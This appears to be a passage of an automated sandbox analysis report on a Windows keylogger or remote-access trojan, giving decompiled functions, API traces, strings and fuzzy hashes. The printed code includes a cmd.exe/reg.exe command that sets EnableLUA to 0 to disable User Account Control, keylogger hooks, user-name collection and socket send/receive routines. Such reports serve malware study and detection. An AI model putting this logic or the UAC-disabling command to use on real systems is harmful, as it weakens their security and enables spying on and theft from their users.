                                  			}

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
                                  				struct _PROCESS_INFORMATION _v20;
                                  				struct _STARTUPINFOA _v88;
                                  				signed int _t17;
                                  
                                  				_t17 = 0x11;
                                  				memset( &_v88, 0, _t17 << 2);
                                  				_v88.cb = 0x44;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                  				CloseHandle(_v20);
                                  				return CloseHandle(_v20.hThread);
                                  			}

                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                  • CloseHandle.KERNEL32(?), ref: 0040A12E
                                  • CloseHandle.KERNEL32(?), ref: 0040A133
                                  Strings
                                  • D, xrefs: 0040A0F6
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                  • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                  • API String ID: 2922976086-1747066916
                                  • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                  • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                  • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
E00405532(void* __ecx) {
	signed int _t8;
	WCHAR* _t9;
	long _t12;
	void* _t21;
	void* _t22;
	void* _t28;

	/* 64-bit size threshold: low dword at 0x41b988, high dword at 0x41b98c; a zero threshold skips the loop */
	_t8 =  *0x41b988; // 0x0
	_t9 = _t8 |  *0x41b98c;
	_t22 = __ecx;
	if(_t9 != 0) {
		 *((char*)(__ecx + 0x30)) = 0; /* "threshold reached" flag at this+0x30 */
		do {
			__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
			/* GENERIC_READ, FILE_SHARE_READ|WRITE|DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL */
			_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
			_t21 = _t9;
			if(_t21 == 0xffffffff) {
				 *((char*)(_t22 + 0x30)) = 0;
			} else {
				_t12 = GetFileSize(_t21, 0);
				/* 64-bit compare of (0, size) against (high, low): true when the file has reached the threshold */
				_t28 = 0 -  *0x41b98c; // 0x0
				if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
					 *((char*)(_t22 + 0x30)) = 1;
					if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
						E00405D50(_t22);
					}
					Sleep(0x2710); /* poll again in 10 s while the file stays at or above the threshold */
				}
				_t9 = CloseHandle(_t21);
			}
		} while ( *((char*)(_t22 + 0x30)) == 1);
		/* once the file drops below the threshold: if this+0x3c is clear and the config byte at 0x41b154 is '1', copy the string at this+0x54 and call E00405180 */
		if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
			__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
			return E00405180(_t22);
		}
	}
	return _t9;
}

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3524115370-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
E00412DDF(WCHAR* _a4, void* _a8) {
	struct _OVERLAPPED* _t13;
	void* _t16;
	long _t17;
	void* _t19;
	long* _t8; /* declaration added: the decompile uses _t8 as lpNumberOfBytesRead without declaring it */

	_t13 = 0;
	/* open the path in _a4 for reading: GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING */
	_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
	if(_t19 != 0xffffffff) {
		_t17 = GetFileSize(_t19, 0);
		/* grow the receiving std::string (this pointer in ecx, not recovered by the decompiler) to the file size, then read the whole file into its buffer */
		__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
		_t8 =  &_a4;
		_a4 = 0;
		__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
		if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
			_t13 = 1; /* success flag, returned as the result */
		}
		CloseHandle(_t19);
		return _t13;
	}
	return 0;
}

                                  APIs
                                  • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
E00412163(intOrPtr _a4) {
	char _v5;
	char _v12;
	long _v16;
	char _v32;
	void* _v48;
	char _v80;
	short _v592;
	char* _t23;
	char* _t25;

	_v12 = 0x10;
	 *0x41c1e8(1,  &_v80,  &_v12); /* indirect call through a resolved function pointer at 0x41c1e8 (target not recovered) */
	_v16 = 0x100;
	GetUserNameW( &_v592,  &_v16); /* current user name into a 0x100-wchar buffer */
	_t23 =  &_v5;
	__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
	_t25 =  &_v32;
	/* L0041416A / L00414146 are the two std::operator+ thunks listed under APIs (refs 004121BD and 004121C9): the user name is joined with "/" and the other string */
	L0041416A();
	L00414146();
	/* destroy the temporaries; the concatenated wide string is returned in _a4 */
	__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
	__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
	return _a4;
}

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
E00409D02(void** _a4) {
	void* _t4;
	long _t5;
	struct HRSRC__* _t7;

	/* locate the "SETTINGS" resource of type 0xa (RT_RCDATA) in the sample's own image, which holds its embedded settings */
	_t7 = FindResourceA(0, "SETTINGS", 0xa);
	_t4 = LockResource(LoadResource(0, _t7));
	_t5 = SizeofResource(0, _t7);
	 *_a4 = _t4; /* pointer to the resource data is returned through _a4, its size as the result */
	return _t5;
}

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
E004126EF(char _a4) {
	void* _t2;
	void* _t3;
	void** _t1; /* declaration added: the decompile uses _t1 without declaring it */

	_t1 = (void**) &_a4; // 0x40e322
	_t2 = GetCurrentProcess();
	_t3 = GetCurrentThread();
	/* duplicate the current thread's handle into this process; 1 = bInheritHandle, 2 = DUPLICATE_SAME_ACCESS */
	return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
}

                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
                                  • API String ID: 901373779-0
                                  • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
E00405C62(void* __ecx) {
	long _t7;
	void* _t10;
	void* _t18;
	void* _t19;

	_t18 = __ecx;
	_t7 = CreateEventA(0, 0, 0, 0); /* unnamed auto-reset event, initially unsignaled, kept at this+0x34 */
	 *(_t18 + 0x34) = _t7;
	if( *((char*)(_t18 + 0x3d)) != 0) { /* run flag at this+0x3d */
		_t10 = _t18 + 0x14; /* pending-data std::string at this+0x14 */
		do {
			/* operator!= against the string constant at 0x415664: only act when the buffer is non-empty */
			__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
			if(_t7 != 0) {
				_t19 = _t19 - 0x10; /* stack reservation for a temporary std::string (decompiler artifact) */
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				/* hand the copy to E004020C2 with the network object at 0x41be70 and message id 0x5a, then reset the buffer */
				E004020C2(0x41be70, 0x5a, _t10);
